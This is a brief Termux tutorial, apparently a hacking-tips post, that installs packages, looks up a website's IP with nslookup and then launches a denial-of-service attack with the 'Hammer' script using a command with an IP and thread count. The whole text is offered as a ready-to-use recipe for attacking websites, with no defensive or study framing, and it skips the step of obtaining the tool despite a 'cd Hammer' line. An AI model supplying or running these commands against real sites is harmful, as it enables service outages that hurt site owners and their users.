How To Get Any Website IP Address By Termux

🔴Install Hammer

$ apt update
$ apt upgrade
$ apt install python
$ apt install git
$ apt install dnsutils

🔴Use Hammer Tool To Get Website IP

Hammer need the Name Server of a website which you want to attack...
To get the Name Server...just type

$ nslookup example.com

Note the IP Address of that Website
Then

🔴Do Dos Attack

$ cd Hammer
$ python hammer.py -s [ip Address] -t 135
example:
$ python hammer.py -s 123.45.67.89 -t 135